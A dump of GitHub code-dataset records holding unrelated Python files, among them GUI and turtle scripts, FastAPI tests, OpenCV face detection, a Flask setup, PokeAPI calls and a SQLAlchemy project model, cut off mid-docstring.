Créer la fenêtre de calcul de distance entre deux villes.\n\n :param cities: La liste des villes disponibles (dictionnaires avec lat et lng en propriétés)\n \"\"\"\n cities_name = list(cities)\n\n root = tk.Toplevel()\n root.wm_title('Calcul de la distance')\n\n city1_var = tk.StringVar()\n city1_dropdown = tk.OptionMenu(root, city1_var, *cities_name)\n city1_dropdown.pack()\n\n city2_var = tk.StringVar()\n city2_dropdown = tk.OptionMenu(root, city2_var, *cities_name)\n city2_dropdown.pack()\n\n label = tk.Label(root, text=\"\")\n label.pack()\n\n def on_city_update(_, __, ___):\n \"\"\"\n Fonction d'écoute de l'événement de mise à jour d'un dropdown.\n \"\"\"\n city1 = city1_var.get()\n city2 = city2_var.get()\n\n if city1 and city2:\n coords1 = (cities[city1][\"lat\"], cities[city1][\"lng\"])\n coords2 = (cities[city2][\"lat\"], cities[city2][\"lng\"])\n\n dist = geodesic(coords1, coords2).kilometers\n label.config(text=f\"Distance : {int(dist)}kms\")\n\n city1_var.trace('w', on_city_update)\n city2_var.trace('w', on_city_update)\n\n exit_button = tk.Button(root, text=\"Quitter\", command=root.destroy)\n exit_button.pack()\n","repo_name":"ctrl-plus-w/esaip-project-villes","sub_path":"src/utils/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13372380911","text":"import turtle\nimport colorsys\n\ndef estrella(tamano):\n for x in range(5):\n turtle.fd(tamano)\n turtle.rt(144)\n\nturtle.speed(0)\nturtle.pensize(2.5)\n\nfor a in range(1, 10000000, 15):\n color = colorsys.hsv_to_rgb(a / 101, 1.0, 1.0)\n turtle.pencolor(color)\n estrella(a)\n turtle.lt(15)\nturtle.done()\n","repo_name":"ogarnica/Compumaticas","sub_path":"estrella.py","file_name":"estrella.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33258440002","text":"import pytest\nfrom fastapi.testclient import TestClient\nfrom main import app\n\nclient = TestClient(app)\n\n\nclass TestCase:\n\n @pytest.mark.parametrize('token_id', [\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.mUnSxfiXA4zkxTrIVT3l2FRBMfTcHTLOd5oVHDaKnWo\"])\n def test_retrieve_wishlist_for_a_user(self, token_id):\n \"\"\"\n desc: test case for retrieval of all books in wishlist for a users.\n \"\"\"\n response = client.get(\"/wishlist/\", headers={'token': token_id})\n json_response = response.json()\n assert 
json_response[\"message\"] == \"Successfully Get A Wishlist\"\n\n    @pytest.mark.parametrize('token_id', [\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo1fQ.K4UUqOCE7e7M4yo9LTs2gUaJURg-8DAajx95oj-QIgQ\"])\n    def test_retrieve_users_detail_if_users_not_exist(self, token_id):\n        \"\"\"\n        desc: test case for retrieval of all books from the wishlist for a user whose id doesn't exist, so it will raise an exception\n        \"\"\"\n        response = client.get(\"/wishlist/\", headers={'token': token_id})\n        json_response = response.json()\n        assert json_response[\"message\"] == \"Error : There is no result for the Wishlist.\"\n\n    @pytest.mark.parametrize('user_data, token_id', [({\"book_id\": 17}, \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.mUnSxfiXA4zkxTrIVT3l2FRBMfTcHTLOd5oVHDaKnWo\")])\n    def test_if_user_added_to_db(self, user_data, token_id):\n        response = client.post(\"/wishlist/\", json=user_data, headers={'token': token_id})\n        assert response.json()[\"message\"] == \"Book Successfully Added To wishlist!!\"\n\n    @pytest.mark.parametrize('book_id, token_id', [(7, \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.mUnSxfiXA4zkxTrIVT3l2FRBMfTcHTLOd5oVHDaKnWo\")])\n    def test_if_user_is_deleted(self, book_id, token_id):\n        response = client.delete(f\"/wishlist/{book_id}\", headers={'token': token_id})\n        json_response = response.json()\n        assert json_response[\"message\"] == \"Book Successfully Removed From wishlist!!\"\n","repo_name":"mukul-jain12/Book_Store_APP","sub_path":"tests/test_wishlist_apis.py","file_name":"test_wishlist_apis.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"28151394300","text":"import cv2\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nvideoCapture = cv2.VideoCapture(0)\n\nwhile True:\n    # Face detection part\n    ret, frame =videoCapture.read()\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n    # Draw the surrounding rectangle\n\n    for (x, y, w, h) in faces:\n        cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 255, 0), 2)  # the last value sets the thickness, the one before it sets the color\n    cv2.imshow('Video', frame)\n\n    # press the q key to quit the application\n    if(cv2.waitKey(1) & 0XFF == ord('q')):\n        break\n\nvideoCapture.release()\ncv2.destroyAllWindows()\n","repo_name":"Arda1999/FaceDetector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"30467858215","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n\"\"\"\nExample:\n\n$ mpirun -n P python ./heat_transfer.py N M bpfile varname [varname [...]]\n\"\"\"\n\nimport adios2\nimport argparse\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport decomp\n\n\ndef SetupArgs():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\"--infile\", \"-f\", help=\"Name of the bp file\", required=True)\n    parser.add_argument(\"--outfile\", \"-o\", help=\"Name of the output bp file\", required=True)\n#    parser.add_argument(\"--xmlfile\", \"-x\", help=\"Name of the XML config file\", required=True)\n\n    parser.add_argument(\"--varname\", \"-v\", help=\"Name of variable read\", default=\"T\")\n\n    
parser.add_argument(\"--nx\", '-nx', help=\"Number of reading process in X dimension\", type=int, default=1)\n parser.add_argument(\"--ny\", '-ny', help=\"Number of reading process in Y dimension\", type=int, default=1)\n\n parser.add_argument(\"--nompi\", \"-nompi\", help=\"ADIOS was installed without MPI\", action=\"store_true\")\n parser.add_argument(\"--plot\", \"-p\", help=\"Make a plot of the input data\", action=\"store_true\")\n\n args = parser.parse_args()\n return args\n\n\n\ndef Plot2D(args, fr, fullshape, step, fontsize, displaysec):\n data = fr.read(args.varname, [0, 0], fullshape, step, 1)\n gs = gridspec.GridSpec(1, 1)\n fig = plt.figure(1, figsize=(8,10))\n ax = fig.add_subplot(gs[0, 0])\n\n print (\"data size:\", fullshape[0],\"x\",fullshape[1])\n print (data.shape)\n ax.imshow(data[0, :, :], origin='lower', extent=[0, fullshape[1], 0, fullshape[0]] )\n\n for i in range(args.ny):\n y = fullshape[0] / args.ny * i\n ax.plot([0, fullshape[1]], [y, y], color='black')\n\n for i in range(args.nx):\n x = fullshape[1] / args.nx * i\n ax.plot([x, x], [0, fullshape[0]], color='black')\n\n ax.set_title(\"Timestep = {0}\".format(step), fontsize=fontsize)\n for i in range(mpi.size):\n ax.text(Start[i][1], Start[i][0], \"rank: {0}\".format(i), fontsize=fontsize)\n\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n\n plt.ion()\n plt.show()\n plt.pause(displaysec)\n plt.clf()\n\n\nif __name__ == \"__main__\":\n\n # fontsize on plot\n fontsize = 22\n displaysec = 0.5\n\n # Parse command line arguments\n args = SetupArgs()\n\n # Setup up 2D communicators if MPI is installed\n mpi = decomp.MPISetup(args)\n\n\n # Read the data from this object\n fr = adios2.open(args.infile, \"r\", mpi.comm_world, \"adios2.xml\", \"VizInput\")\n\n # Calculate difference between steps, and write to this object\n fw = adios2.open(args.outfile, \"w\", mpi.comm_world)\n\n\n # Get the ADIOS selections -- equally partition the data if parallelization is requested\n start, size, fullshape = mpi.Partition(fr, args)\n Start = mpi.comm_world.gather(start, root=0)\n\n\n # Read through the steps, one at a time\n step = 0\n while (not fr.eof()):\n data = fr.read(args.varname, start, size, endl=True)\n\n\n # Print a couple simple diagnostics\n avg = np.average(data)\n std = np.std(data)\n for i in range(mpi.size):\n mpi.comm_world.Barrier()\n if i == mpi.rank['world']:\n print(\"step:{0}, rank: {1}, avg: {2:.3f}, std: {3:.3f}\".format(step, mpi.rank['world'], avg, std))\n\n\n if (mpi.rank['world'] == 0) and (args.plot):\n Plot2D(args, fr, fullshape, step, fontsize, displaysec)\n\n\n if (step > 0):\n dt = data - olddata\n fw.write(\"d{0}\".format(args.varname), dt, fullshape, start, size, endl=True)\n olddata = np.copy(data)\n\n step += 1\n\n fr.close()\n fw.close()\n\n","repo_name":"pnorbert/adiosvm","sub_path":"Tutorial/heat2d/python/.obsolete/heat_all.py","file_name":"heat_all.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"20138139787","text":"# Python 3 code to find sum\n# of elements in given array\ndef _sum(arr):\n\t\n\t# initialize a variable\n\t# to store the sum\n\t# while iterating through\n\t# the array later\n\tsum=0\n\t\n\t# iterate through the array\n\t# and add each element to the sum variable\n\t# one at a time\n\tfor i in arr:\n\t\tsum = sum + i\n\t\t\n\treturn(sum)\n\n# driver function\narr=[]\n# input values to list\narr = [12, 3, 4, 15]\n\n# calculating length of array\nn = len(arr)\n\nans = 
_sum(arr)\n\n# display sum\nprint ('Sum of the array is ', ans)\n\n","repo_name":"Sangwan5688/Hacktoberfest2021","sub_path":"Python/sum_of_array.py","file_name":"sum_of_array.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"40"} +{"seq_id":"73495744760","text":"import time\n\n\ndef fibonacci(n):\n if n == 0:\n return 0\n if n == 1:\n return 1\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\ndef main():\n while True:\n print('\\n' + '='*60)\n n = int(input('Quantos elementos da série de Fibonacci deseja imprimir? '))\n\n t_inicio = time.time()\n\n for i in range(1, n + 1):\n print(fibonacci(i), end=' ')\n\n t_fim = time.time()\n\n t_total = t_fim - t_inicio\n print('\\nTempo de execução (em segundos): {}'.format(t_total))\n\n\nmain()\n","repo_name":"emersondevelops/exercicios-cc-unipe","sub_path":"estrutura-de-dados-ii/recursividade/serie-de-fibonacci-recursiva.py","file_name":"serie-de-fibonacci-recursiva.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42310171575","text":"import numpy as np\n\n\ndef matrix_product(a, b):\n return np.matmul(a, b)\n\ndef rand_matrix():\n ti1 = []\n ti2 = []\n for i in range(0,8):\n tj1 = []\n tj2 = []\n for j in range(0, 8):\n tj1.append(np.random.randint(0, 5))\n tj2.append(np.random.randint(0, 5))\n ti1.append(tj1)\n ti2.append(tj2)\n\n return ti1, ti2\n\ndef main():\n a, b = rand_matrix()\n c = matrix_product(b, a)\n print(a)\n print(b)\n print(\"=\")\n print(c)\n\nif __name__ == '__main__':\n main()","repo_name":"KrzysztofKumka/PwJS_PythonExercises","sub_path":"Calculations and algotithms/matrix_multiplication.py","file_name":"matrix_multiplication.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23572443956","text":"from flask import Flask\n\nfrom flask.ext.script import Manager\nfrom flask.ext.login import LoginManager\nfrom flask.ext.security import Security, SQLAlchemyUserDatastore\nfrom flask.ext.assets import Environment, Bundle\n\n#from bounty.settings import DEBUG, SECRET_KEY\nfrom bounty.moment_js import moment_js\n\napp = Flask(__name__)\napp.config.from_object('bounty.settings')\n#app.debug = DEBUG\n#app.secret_key = SECRET_KEY\n\nmanager = Manager(app)\n\napp.jinja_env.globals['moment_js'] = moment_js\n\nlm = LoginManager()\nlm.setup_app(app)\nlm.login_view = 'user.login'\nlm.session_protection = \"strong\"\n\nfrom bounty.models import *\n\nfrom bounty.views import admin, base, fundraisers, users\n\napp.register_blueprint(fundraisers.fundraiser_bp, url_prefix='/')\napp.register_blueprint(admin.admin_bp, url_prefix='/admin')\napp.register_blueprint(users.user_bp, url_prefix='/user')\n\nuser_datastore = SQLAlchemyUserDatastore(db, User, Role)\nsecurity = Security(app, user_datastore)\n\nassets = Environment(app)\n\ncss = Bundle('css/bootstrap.min.css',\n 'css/bootstrap-responsive.css',\n 'css/bootstrap-datetimepicker.min.css',\n 'css/bounty.css')\nassets.register('css_all', css)\n\njs = Bundle('js/vendor/jquery-1.9.1.min.js',\n 'js/vendor/bootstrap.min.js',\n 'js/vendor/bootstrap-datetimepicker.min.js',\n 'js/vendor/modernizr-2.6.2-respond-1.1.0.min.js',\n 'js/bounty.js')\nassets.register('js_all', js)\n\nfav_icon = Bundle('img/favicon.ico')\nassets.register('fav_icon', 
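# --- Editor's note: the recursive fibonacci in the record above recomputes each
# value, so it is exponential in n (which is what its timing loop demonstrates).
# A hedged drop-in variant with standard-library memoization keeps the recursive
# shape but runs in linear time:
from functools import lru_cache

@lru_cache(maxsize=None)
def fibonacci_memo(n):
    if n < 2:
        return n
    return fibonacci_memo(n - 1) + fibonacci_memo(n - 2)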
fav_icon)\n","repo_name":"ardinor/bounty","sub_path":"bounty/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18900347109","text":"import requests\n\n# PARTE 1: HABILIDADES DE POKEMON\n\n# Lista de pokemones\npokemones = [\"ditto\", \"pikachu\", \"charmander\", \"bulbasaur\", \"squirtle\"]\n\n# Recorrer cada pokemon\nfor pokemon in pokemones:\n\n # Obtener enlace para extraer la información\n url = f\"https://pokeapi.co/api/v2/pokemon/{pokemon}\"\n \n # Solicitard atos y convertirlos a json\n res = requests.get (url)\n json_data = res.json()\n \n # Obtener y mostrar la primer habilidad de cada pokemon\n habilidad = json_data[\"abilities\"][1][\"ability\"][\"name\"]\n\n print (f\"{pokemon}: {habilidad}\")\n\n# PARTE 2: POKEMONS DE UN COLOR\n\n# Obtener la lista de pokemons de un color en específico\ncolor = \"green\"\nurl = f\"https://pokeapi.co/api/v2/pokemon-color/{color}/\"\nres = requests.get (url)\njson_data = res.json()\npokemones = json_data[\"pokemon_species\"]\n\n# Recorrer cada pokemon de la lista\nfor pokemon in pokemones:\n \n # Obtener nombre y url del pokemon\n pokemon_nombre = pokemon[\"name\"]\n pokemon_url = pokemon[\"url\"]\n \n # Solicitar informaicón detallada del pokemon\n pokemon_res = requests.get (pokemon_url)\n pokemon_json_data = pokemon_res.json()\n habitad_dic = pokemon_json_data[\"habitat\"]\n \n # Obtener el habitad o asignar un valor predeterminado si no existe\n if habitad_dic != None:\n habitad = habitad_dic[\"name\"]\n else:\n habitad = \"No tiene habitat\"\n \n # Mostrar información del habitad\n print (f\"{pokemon_nombre}: {habitad}\")\n \n \n ","repo_name":"darideveloper/cursos-y-clases","sub_path":"Ernesto/clase_8/21_request.py","file_name":"21_request.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7099201375","text":"import argparse\nimport random\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_examples', type=int, required=True)\n parser.add_argument('--words_path', type=str, default=\"data/finetune_x.txt\")\n parser.add_argument('--save_path', type=str, required=True)\n args = parser.parse_args()\n words = set()\n with open(args.words_path, 'r') as f:\n for line in f:\n for word in line.split():\n words.add(word)\n with open(args.save_path, 'w') as f:\n for i in range(args.num_examples):\n for j in range(4):\n hm = random.randint(1, 2)\n sample = random.sample(sorted(words), hm)\n line = \" \".join(sample) + \"\\n\"\n f.write(line)\n f.write(\"\\n\")\n\n\n ","repo_name":"dmkwis/POLTORA-TALERZA","sub_path":"prompt_generator.py","file_name":"prompt_generator.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25312914306","text":"# 틀렸음\nm,s=map(int, input().split(' '))\n\n# x,y,d\nfish=[list(map(int, input().split(' '))) for _ in range(m)]\n# dummy (행렬상 좌표 주의)\ndirections=[(),(0,-1),(-1,-1),(-1,0),(-1,1),(0,1),(1,1),(1,0),(1,-1)]\n\n# 상어 위치\nsx, sy=map(int, input().split(' '))\n\n# 격자 칸의 상황(dummy 포함)\n# 냄새 -> 2\narea=[[0]*5 for _ in range(5)]\n\n# 물고기 냄새를 남길 좌표 저장\ndelete_fish = []\n\ndef move_fish():\n global fish, area\n\n new_fish=[]\n while fish:\n x,y,d=fish.pop(0)\n # d에서 0까지 탐색(반시계 회전 인 것 주의!)\n for i in range(d,0,-1):\n dx=x+directions[i][0]\n 
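# --- Editor's note: hedged variant of the PokeAPI calls in the record above with
# basic error handling. Note the original reads abilities[1] while its comment
# says "first ability", which also raises IndexError for single-ability pokemon;
# this sketch guards both cases. Endpoint and fields are the ones already used.
import requests

def get_first_ability(pokemon):
    res = requests.get(f"https://pokeapi.co/api/v2/pokemon/{pokemon}", timeout=10)
    res.raise_for_status()                  # fail loudly on HTTP errors
    abilities = res.json()["abilities"]
    return abilities[0]["ability"]["name"] if abilities else "none"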
dy=y+directions[i][1]\n # 격자 범위 안에 해당하면서 상어가 존재하거나 물고기 냄새가 존재하는 경우가 아니면 이동 가능\n if 1<=dx<=4 and 1<=dy<=4 and area[dx][dy]==0 and (dx!=sx or dy!=sy):\n new_fish.append([dx,dy,i])\n break\n # 위 for문에서 가능한 칸이 없을 경우, 끝에서 d까지 인덱스 탐색\n else:\n for i in range(8,d,-1):\n dx = x + directions[i][0]\n dy = y + directions[i][1]\n if 1 <= dx <= 4 and 1 <= dy <= 4 and area[dx][dy] == 0:\n new_fish.append([dx, dy, i])\n break\n # 모두 해당하지 않으면 기존 위치와 방향 다시 넣어줌\n else:\n new_fish.append([x,y,d])\n # fish 배열 update\n fish=[arr[:] for arr in new_fish]\n # 위치별 물고기 수 저장\n numberoffish = [[0] * 5 for _ in range(5)]\n for x,y,d in fish:\n numberoffish[x][y]+=1\n\n return numberoffish\n\n\n\ndef move_shark():\n global area, fish, nf, sy, sx, step, delete_fish\n # 인접한 상하좌우 칸으로 이동\n # 상 좌 하 우(x,y) 행 열로 생각\n direction=[(),(-1,0),(0,-1),(1,0),(0,1)]\n fishmax=-1e9\n dictmin=1e9\n # 상어가 이동할 최종 좌표\n change_x=sx\n change_y=sy\n # 3중 for문으로 각 단게를 거치면서 총 물고기 수를 파악하고, 사전순도 체크\n for one in range(1,5):\n for two in range(1,5):\n for three in range(1,5):\n new_x=sx\n new_y=sy\n numfish=0\n move_dir=[one, two, three]\n visited=[[0]*5 for _ in range(5)]\n for m in move_dir:\n new_x=new_x+direction[m][0]\n new_y=new_y+direction[m][1]\n if 1<=new_x<=4 and 1<=new_y<=4:\n # 이동하는 칸에 물고기가 존재하면\n if nf[new_x][new_y]>0 and visited[new_x][new_y]==0:\n # 먹은 물고기 수 더해주고\n numfish+=nf[new_x][new_y]\n # 방문 표시\n visited[new_x][new_y] = 1\n else:\n # 범위을 벗어나면 해당 방법은 불가능한 것\n break\n # for문을 도는 동안 break되지 않으면? -> 가능한 경로라는 뜻 -> 최대 물고기 값인지 확인\n else:\n numdict = int(str(one) + str(two) + str(three))\n if fishmaxnumdict:\n dictmin=numdict\n change_y=new_y\n change_x=new_x\n # 최종적으로 정해진 dictmin으로 delete fish 저장\n t_sy=sy\n t_sx=sx\n for n in list(str(dictmin)):\n t_sx+=direction[int(n)][0]\n t_sy+=direction[int(n)][1]\n if nf[t_sx][t_sy]>0:\n delete_fish.append((t_sx,t_sy, step))\n # 상어 냄새 남기기\n area[sx][sy]=2\n # 상어 좌표 업데이트\n sy=change_y\n sx=change_x\n\n\n # delete_fish에 저장된 대로 해당 칸에 물고기 제거하고 냄새 남김\n for x,y,s in delete_fish:\n if s>step:\n break\n elif s==step:\n area[x][y]=2\n # 해당 칸 물고기 제거\n delelte_idx=[]\n for idx in range(len(fish)):\n if fish[idx][0]==x and fish[idx][1]==y:\n delelte_idx.append(idx)\n fish=[fish[i] for i in range(len(fish)) if i not in delelte_idx]\n\n\ndef delete_smell():\n global delete_fish, area, step\n for x,y,s in delete_fish:\n if s>(step-2):\n break\n elif s==(step-2):\n area[x][y]=0\n\n\n\n\n\nstep=1\nwhile step<=s:\n # 상어가 복제 마법을 걸어둠\n copy_fish=[arr[:] for arr in fish]\n # 물고기가 한 칸씩 이동하고, 각 위치별로 물고기의 수를 나타내는 이차원 배열 nf를 리턴\n nf=move_fish()\n # 상어가 연속해서 3칸을 이동함\n move_shark()\n # 두 번 전 연습에서 남긴 냄새는 삭제\n delete_smell()\n # 복제 마법 완료\n fish+=copy_fish\n step+=1\n\n# 격자에 존재하는 물고기의 수\nprint(len(fish))\n\n\n","repo_name":"hyunji-lee99/algorithm_study","sub_path":"baekjoon/Samsung SW/23290.py","file_name":"23290.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6120536487","text":"\"\"\"Briefy Leica Project model.\"\"\"\nfrom briefy.common.db.models import Item\nfrom briefy.common.utils import schema\nfrom briefy.common.utils.data import Objectify\nfrom briefy.common.vocabularies.categories import CategoryChoices\nfrom briefy.common.vocabularies.roles import Groups\nfrom briefy.leica.cache import cache_region\nfrom briefy.leica.cache import enable_cache\nfrom briefy.leica.models import mixins\nfrom briefy.leica.models.project import workflows\nfrom briefy.leica.utils.user import add_user_info_to_state_history\nfrom 
briefy.leica.vocabularies import AssetTypes\nfrom briefy.leica.vocabularies import OrderTypeChoices\nfrom briefy.leica.vocabularies import ProjectTypeChoices\nfrom briefy.ws.errors import ValidationError\nfrom sqlalchemy import event\nfrom sqlalchemy import orm\nfrom sqlalchemy.dialects.postgresql import JSONB\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\nimport colander\nimport sqlalchemy as sa\nimport sqlalchemy_utils as sautils\nimport typing as t\n\n\n# TODO: improve this based on the project type\nDEFAULT_DELIVERY_CONFIG = {\n 'approve': {\n 'archive': {\n 'driver': 'gdrive',\n 'images': True,\n 'name': 'order.customer_order_id',\n 'other': True,\n 'parentId': None,\n 'resize': [],\n 'subfolders': True\n },\n 'delivery': {\n 'driver': 'gdrive',\n 'images': True,\n 'name': 'order.customer_order_id',\n 'other': False,\n 'parentId': None,\n 'resize': [],\n 'subfolders': False\n }\n }\n}\n\nDEFAULT_ADD_ORDER_ROLES = [\n 'g:customers',\n 'g:briefy_pm',\n]\n\n\nclass IProject(Interface):\n \"\"\"Marker interface for Project.\"\"\"\n\n\nclass CommercialInfoMixin(mixins.ProfessionalPayoutInfo, mixins.ProjectRolesMixin,\n mixins.OrderFinancialInfo):\n \"\"\"Commercial details about a project.\"\"\"\n\n contract = sa.Column(\n sautils.URLType,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Contract',\n 'validator': colander.url,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Path to contract.\"\"\"\n\n\n@implementer(IProject)\nclass Project(CommercialInfoMixin, mixins.ProjectRolesMixin,\n mixins.LeicaSubMixin, Item):\n \"\"\"A Project in Briefy.\"\"\"\n\n _workflow = workflows.ProjectWorkflow\n\n __summary_attributes__ = [\n 'id', 'title', 'description', 'created_at', 'updated_at',\n 'state', 'slug', 'asset_types', 'order_type', 'project_type'\n ]\n\n __summary_attributes_relations__ = ['customer', 'pool', 'customer_users']\n\n __listing_attributes__ = __summary_attributes__ + [\n 'total_orders', 'total_leadorders', 'customer', 'category', 'internal_pm'\n ]\n\n __exclude_attributes__ = ['orders', 'leadorders']\n\n __to_dict_additional_attributes__ = ['price', 'total_orders', 'total_leadorders']\n\n __raw_acl__ = (\n ('create', ('g:briefy_pm', 'g:briefy_bizdev', 'g:briefy_finance', 'g:system')),\n ('list', ('g:briefy_qa', 'g:briefy_bizdev',\n 'g:briefy_scout', 'g:briefy_finance', 'g:system')),\n ('view', ('g:briefy_qa', 'g:briefy_bizdev',\n 'g:briefy_scout', 'g:briefy_finance', 'g:system')),\n ('edit', ('g:briefy_pm', 'g:briefy_bizdev', 'g:briefy_finance', 'g:system')),\n ('delete', ('g:briefy_finance', 'g:system')),\n )\n\n __colanderalchemy_config__ = {\n 'excludes': [\n 'state_history', 'state', 'customer', 'pool',\n ],\n 'overrides': mixins.ProjectRolesMixin.__colanderalchemy_config__['overrides']\n }\n\n __parent_attr__ = 'customer_id'\n\n customer_id = sa.Column(sautils.UUIDType,\n sa.ForeignKey('customers.id'),\n index=True,\n nullable=False,\n info={'colanderalchemy': {\n 'title': 'Customer',\n 'validator': colander.uuid,\n 'typ': colander.String}}\n )\n \"\"\"Customer ID.\n\n Builds the relation with :class:`briefy.leica.models.customer.Customer`.\n \"\"\"\n\n customer_users = orm.relationship(\n 'CustomerUserProfile',\n primaryjoin='and_('\n 'foreign(CustomerUserProfile.customer_id)==Project.customer_id,'\n 'LocalRole.principal_id==foreign(CustomerUserProfile.id),'\n 'LocalRole.item_id==Project.id)',\n lazy='dynamic',\n info={\n 'colanderalchemy': {\n 'title': 
'Customer User Profiles',\n 'missing': colander.drop,\n }\n }\n )\n \"\"\"List of customer user profiles connected to this project.\n\n Returns a collection of :class:`briefy.leica.models.user.CustomerUserProfile`.\n \"\"\"\n\n abstract = sa.Column(\n 'abstract',\n sa.Text,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Abstract',\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Abstract for a project.\n\n Text field allowing a small, but meaningful description for an object.\n Used to store Bizdev comments.\n \"\"\"\n\n order_type = sa.Column(\n sautils.ChoiceType(OrderTypeChoices, impl=sa.String()),\n default='order',\n nullable=False,\n info={\n 'colanderalchemy': {\n 'title': 'Type of Order',\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Type of order the project support.\"\"\"\n\n project_type = sa.Column(\n sautils.ChoiceType(ProjectTypeChoices, impl=sa.String()),\n default='on-demand',\n nullable=False,\n info={\n 'colanderalchemy': {\n 'title': 'Type of Project',\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Type of package the project support.\"\"\"\n\n leadorder_confirmation_fields = sa.Column(\n JSONB,\n default=['availability'],\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Fieldnames required to confirm a LeadOrder.',\n 'missing': colander.drop,\n 'typ': schema.List()\n }\n }\n )\n \"\"\"List with fieldnames required to confirm a LeadOrder.\"\"\"\n\n number_required_assets = sa.Column(sa.Integer(), default=10)\n \"\"\"Number of required assets of a Project to be used in the Order as default value.\"\"\"\n\n asset_types = sa.Column(\n JSONB,\n info={\n 'colanderalchemy': {\n 'title': 'Asset types.',\n 'missing': colander.drop,\n 'typ': schema.List()\n }\n }\n )\n \"\"\"Asset types supported by this project.\n\n Options come from :mod:`briefy.leica.vocabularies.AssetTypes`.\n \"\"\"\n\n @orm.validates('asset_types')\n def validate_asset_types(self, key, value):\n \"\"\"Validate if values for asset_types are correct.\"\"\"\n members = AssetTypes.__members__\n for item in value:\n if item not in members:\n raise ValidationError(message='Invalid type of asset', name=key)\n return value\n\n category = sa.Column(\n sautils.ChoiceType(CategoryChoices, impl=sa.String()),\n default='undefined',\n nullable=False\n )\n \"\"\"Category of this Project.\n\n Options come from :mod:`briefy.common.vocabularies.categories`.\n \"\"\"\n\n tech_requirements = sa.Column(\n JSONB,\n default=dict,\n info={\n 'colanderalchemy': {\n 'title': 'Technical Requirements for this project.',\n 'missing': colander.drop,\n 'typ': schema.JSONType\n }\n }\n )\n \"\"\"Technical requirements for orders in this project.\n\n It stores a dictionary of requirements to be fulfilled by each asset of each Assignment.\n\n i.e. 
- for a project delivering only photos, its value might be::\n\n [\n {\n \"asset_type\": \"Image\",\n \"set\": {\n \"minimum_number\": 10 # (aliased to 'minimum_number_of_photos' (deprecated))\n },\n \"asset\": {\n \"dimensions\": [\n {\n \"value\": \"4000x3000\",\n \"operator\": \"min\"\n }\n ],\n \"orientation\": [\n {\n \"value\": \"landscape\",\n \"operator\": \"eq\"\n }\n ]\n }\n },\n {\n \"asset_type\": \"Video\",\n \"set\": {\n \"minimum_number\": 2\n },\n \"asset\": {\n \"duration\": {\"value\": \"30\", \"operator\" :\"min\"}\n },\n \"actions\": [\n {\n \"state\": \"post_processing\",\n \"action\": \"copy\",\n \"settings\": {\n \"driver\": \"gdrive\",\n \"parentId\": \"\",\n \"subfolders\": true,\n \"images\": true,\n \"other\": true,\n \"name\": \"order.customer_order_id\",\n \"resize\": []\n }\n },\n ...\n ]\n },\n ...\n ]\n\n\n If there is a single asset type for the project, the outermost list may be omitted -\n and a single copy of the inner dictionary is used. The inner dictionary should\n have the keys \"asset_type\", \"set\" for validation constraints that apply to\n all assets of that type taken together,\n and \"asset\" for denoting constraints for each asset of that type.\n\n (Deprecated: for compatibility reasons, ms.laure code will understand a\n missing \"asset_type\" key will default it to \"Image\".)\n \"\"\"\n\n delivery = sa.Column(\n 